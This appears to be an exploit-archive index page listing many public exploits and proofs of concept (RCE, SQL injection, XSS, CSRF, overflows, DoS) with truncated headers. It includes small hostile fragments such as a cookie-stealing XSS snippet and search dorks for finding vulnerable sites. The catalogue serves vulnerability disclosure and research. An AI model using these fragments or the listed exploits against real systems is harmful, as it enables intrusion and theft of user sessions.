Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ', 'Description' = %q An unauthenticated attacker with network access to the...

Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'uri' class MetasploitModule 'Feng Office 3.7.0.5 - Unauthenticated Remote Command Execution', 'Description' = %q This module exploits arbitrar...

osCommerce 2.3.4 - Multiple Vulnerabilities

Title: osCommerce 2.3.4 - Multiple vulnerabilities Date: 10.07.14 Affected versions: = 2.3.4 latest atm Vendor: oscommerce.com Tested on: Apache 2.2.22 at Debian Contact: smash at devilteam.pl Cross Site Scripting 1. Reflected XSS - Send Email Vulnerable parameters - customersemailaddress &...

Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied inp...

ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)

Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution RCE Date: 2023-02-16 Exploit Author: [email protected] for NetworkSEC NWSSA-002-2023, SC Vendor Homepage: https://servers.asus.com/search?q=ASMB8 Version/Model: ASMB8 iKVM Firmware = 1.14.51 probably others Tested on: Linux...

Car Rental Project 1.0 - Remote Code Execution

Exploit Title: Car Rental Project 1.0 - Remote Code Execution Date: 1/3/2020 Exploit Author: FULLSHADE, SC Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/ Version: 1.0 Tested on: Windows CVE : CVE-2020-5509...

CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)

Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection SSTI Application: CmsMadeSimple Version: v2.2.17 Bugs: SSTI Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 13-07-2023...

CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)

Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution RCE Application: CmsMadeSimple Version: v2.2.17 Bugs: Remote Code ExecutionRCE Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 12-07-2023 Author:...

PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting

Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting XSS Google Dork: None Date: 4/26/2023 Exploit Author: Or4nG.M4n Vendor Homepage: https://github.com/jcwebhole Software Link: https://github.com/jcwebhole/phprestaurants Version: 1.0 functions.php function login...

Restaurant Management System 1.0 - SQL Injection

Exploit Title: Restaurant Management System 1.0 - SQL Injection Date: 2023-03-20 Exploit Author: calfcrusher [email protected] Vendor Homepage: https://www.sourcecodester.com/users/lewa Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html Version: 1.0...

Purchase Order Management-1.0 - Local File Inclusion

Title: Purchase Order Management-1.0 - Local File Inclusion Author: nu11secur1ty Date: 03.06.2023 Vendor: https://www.sourcecodester.com/user/257130/activity Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html Reference:...

4images 1.9 - Remote Command Execution (RCE)

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

WebTareas 2.4 - Blind SQLi (Authenticated)

Exploit Title: WebTareas 2.4 - Blind SQLi Authenticated Date: 04/20/2022 Exploit Author: Behrad Taher Vendor Homepage: https://sourceforge.net/projects/webtareas/ Version: 2.4p3 CVE : CVE-2021-43481 The script takes 3 arguments: IP, user ID, session ID Example usage: python3 webtareassqli.py...

Opmon 9.11 - Cross-site Scripting

Exploit Title: Opmon 9.11 - Cross-site Scripting Date: 2021-06-01 Exploit Author: p3tryx Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time Version: 9.11 Tested on: Chrome, IE and Firefox CVE : CVE-2021-43009 URL POC: alertdocument.cookie; var i=new Image;...

H3C SSL VPN - Username Enumeration

Exploit Title: H3C SSL VPN - Username Enumeration Exploit Author: LiquidWorm H3C SSL VPN Username Enumeration Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd. Product web page: https://www.h3c.com Affected version: n/a Summary: H3C SSL VPN is a secure VPN system based on SSL...

WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)

Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting XSS Date: 3/16/2021 Author: 0xB9 Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/ Version: 1.13.21 Tested on: Windows 10 CVE: CVE-2021-24300 1. Description: This plugin is a easy...

Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)

Exploit Title: Movie Rating System 1.0 - SQLi to RCE Unauthenticated Date: 22/12/2021 Exploit Author: Tagoletta Tağmaç Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html Version: 1.0 Tested on: Ubuntu This exploit only...

Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)

Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting Reflected Date: 10.06.2021 Exploit Author: Akıner Kısa Vendor Homepage: https://cloudron.io Software Link: https://www.cloudron.io/get.html Version: 6.3 CVE : CVE-2021-40868 Proof of Concept: 1. Go to...

RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: RaspAP 2.6.6 - Remote Code Execution RCE Authenticated Date: 23.08.2021 Exploit Author: Moritz Gruber Vendor Homepage: https://raspap.com/ Software Link: https://github.com/RaspAP/raspap-webgui Version: 2.6.6 Tested on: Linux raspberrypi 5.10.52-v7+ import requests from requests.ap...

Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)

Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution Authenticated Date: 2020-12-27 Exploit Author: mari0x00 Vendor Homepage: https://batflat.org/ Software Link: https://github.com/sruupl/batflat/archive/master.zip Description:...

MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation

/ Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation Date: 2020-09-24 Exploit Author: Matteo Malvica Vendor Homepage: https://www.msi.com Software Link: https://msi.gm/ABLTMNB Driver: MSIO64.sys SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD...

RSA IG&L Aveksa 7.1.1 - Remote Code Execution

Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution Date: 2019-04-16 Exploit Author: Jakub Palaczynski, Lukasz Plonka Vendor Homepage: https://www.rsa.com/ Version: 7.1.1, prior to P02 CVE : CVE-2019-3759 all vulnerable versions can be found at...

StreamRipper32 2.6 - Buffer Overflow (PoC)

Exploit Title: StreamRipper32 2.6 - Buffer Overflow PoC Date: 2020-05-14 Exploit Author: Andy Bowden Tested On: Win10 x64 Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper3226.exe Vendor Page: http://streamripper.sourceforge.net/ Version: 2.6 Steps To Reproduce: Double click on...

InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC)

Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service PoC Discovery by: chuyreds Discovery Date: 2019-11-23 Vendor Homepage: http://www.indusoft.com/ Software Link : http://www.indusoft.com/Products-Downloads Tested Version: 8.1 SP1 Vulnerability Type: Denial of Service DoS...

Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion

The following program found through fuzzing and manually modified crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 current stable: // Run with --no-threads for increased reliability const v4 = a: 0, a: 1, a: 2, a: 3, a: 4; function v7v8,v9 if v4.length == 0 v43 = a: 5; ...

Kepler Wallpaper Script 1.1 - SQL Injection

Exploit Title: Kepler Wallpaper Script 1.1 - SQL Injection Dork: N/A Date: 2019-01-19 Exploit Author: Ihsan Sencan Vendor Homepage: https://keplerwallpapers.online/ Software Link: https://codeclerks.com/PHP/1559/Kepler-Wallpaper-Script Version: 1.1 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...

Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)

!/usr/bin/env import sys import requests print '' print ' Proof-Of-Concept for CVE-2018-7600' print ' by Vitalii Rudnykh' print ' Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders' print ' https://github.com/a2u/CVE-2018-7600' print '' print 'Provided only for educational or informatio...

Xoops 2.5.4 - Blind SQL Injection

------------------------------------------ Xoops 2.5.4 Blind SQL Injection ------------------------------------------ Dork: "Powered by XOOPS 2.5.4" Download: http://sourceforge.net/projects/xoops/ Date: 10/12/2011 Author: blkhtc0rp Mail: blkhtc0rpatyahoodotcom Tested on: Freebsd 8 and Debian...

HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)

!/usr/bin/python HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow Tested on Windows 2003 Server SP1. Coded by Mati Aharoni muts..at..offensive-security.com http://www.offensive-security.com/0day/hp-nnm-ov.py.txt shameless plug This vulnerability was found, analysed and exploited as...

ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)

ABB Cylon Aspect 3.08.02 escDevicesUpdate.php Off-by-One Config Write DoS Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.02 Summary: ASPECT is an award-winning scalable building energy...

Check Point Security Gateway - Information Disclosure (Unauthenticated)

Exploit Title: Check Point Security Gateway - Information Disclosure Unauthenticated Exploit Author: Yesith Alvarez Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 Version: R77.20 EOL, R77.30 EOL, R80.10 EOL, R80.20 EOL, R80.20.x, R80.20SP EOL, R80.30 EOL, R80.30SP EOL, R80.40...

Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)

Chyrp 2.5.2 - Stored Cross-Site Scripting XSS Date: 2024-04-24 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://github.com/chyrp/ Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip Version: 2.5.2 Tested on: MacOS Steps to Reproduce - Login from the address:...

Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload

Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload Date: 01-03-2024 Exploit Author: Shubham Pandey Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html...

GLPI 9.5.7 - Username Enumeration

Exploit Title: GLPI 9.5.7 - Username Enumeration Date: 04/29/2023 Author: Rafael B. Vendor Homepage: https://glpi-project.org/pt-br/ Affected Versions: GLPI version 9.1 = 9.5.7 Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz import requests from bs4 import...

Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)

!/usr/bin/env python3 Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution RCE Date: 09/04/2023 Exploit Author: Matisse Beckandt Backendt Vendor Homepage:...

WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)

Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery CSRF Date: 24-03-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/curtain/ Version: 1.0.2 Tested on: Firefox Summary: Cross site forgery vulnerability has been identified...

WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)

Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting XSS Unauthenticated Date: 10/01/2022 Exploit Author: Veshraj Ghimire Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/ Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/...

SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path

Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path Exploit Author: Mert DAŞ Version: 3.11.8 Date: 14.10.2021 Vendor Homepage: https://www.solarwinds.com/ Tested on: Windows 10 Step to discover Unquoted Service Path : -------------------------------------- C:\Users\Mertsc qc...

Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation

Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping Date: 09/07/2021 Exploit Author: Cristian 'void' Giustini Vendor Homepage: https://www.miniorange.com/ Software Link: https://www.drupal.org/project/miniorangesaml Version: 8.x-2.22 REQUIRED...

Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS

Exploit Title: Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS Date: 13.08.2021 Exploit Author: securityforeveryone.com Author Mail: helloATsecurityforeveryone.com Vendor Homepage: https://care2x.org Software Link: https://sourceforge.net/projects/care2002/...

Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)

Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery CSRF Date: 01/05/2021 Exploit Author: Rodolfo Mariano Version: Firmware 1.1.2-1.1.5 CVE: 2021-32403 Exploit Code: document.forms0.submit;...

Tasks 9.7.3 - Insecure Permissions

Exploit Title: Tasks 9.7.3 - Insecure Permissions Date: 18th of July, 2020 Exploit Author: Lyhin's Lab Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ Vendor Homepage: https://tasks.org/ Software Link:...

Selea Targa IP OCR-ANPR Camera - CSRF Add Admin

Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin Date: 07.11.2020 Exploit Author: LiquidWorm Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa...

OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path

Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path Date: 2020-11-08 Exploit Author: Julio Aviña Vendor Homepage: https://www.oki.com/ Software Link: https://www.oki.com/mx/printing/download/sPSV0100412270910.exe Software Version: 1.0.41 File Version: 1.4.2.0 Tested...

PhpIX 2012 Professional - 'id' SQL Injection

Title: PhpIX 2012 Professional - 'id' SQL Injection Date: 2020-02-26 Author: indoushka Tested on : windows 10 Français V.Pro / browser : Mozilla firefox 69.032-bit Vendor : http://www.allhandsmarketing.com/ poc : + Dorking İn Google Or Other Search Enggine. + /productdetail.php?id=448578 ====|...

Sysax Multi Server 5.50 - Denial of Service (PoC)

Exploit Title: Sysax Multi Server 5.50 - Denial of Service PoC Google Dork: NA Date: 2020-01-20 Exploit Author: Shailesh Kumavat Vendor Homepage: https://www.sysax.com/ Software Link: https://www.sysax.com/download.htmsysaxserv Version: Sysax Multi Server 5.50 Tested on: WIndow 7 CVE : if...

JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects

The following sample was found by Fuzzilli and then slightly modified. It crashes JSC in debug builds: function main const v2 = 1337,1337; const v3 = 1337,v2,v2,0; Object.proto = v3; for let v10 = 0; v10 inheritscell-JSC::JSCell::vm, std...

ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service

Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service Date: 2019-10-12 Vendor Homepage: https://www.actfax.com/ Software Link : https://www.actfax.com/download/actfaxsetupx64ge.exe Exploit Author: Achilles Tested Version: 6.92 Tested on: Windows 7 x64 Vulnerability Typ...

WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting

Exploit Title: WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting Google Dork: inurl:/wp-content/themes/zoner/ Date: 2019-09-24 Exploit Author: m0ze Vendor Homepage: https://fruitfulcode.com/ Software Link:...

Enigma NMS 65.0.0 - SQL Injection

-------------------------------------------------------------------- Exploit Title: Enigma NMS searchpattern SQL Injection Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor Homepage: https://www.netsas.com.au/ Software Link:...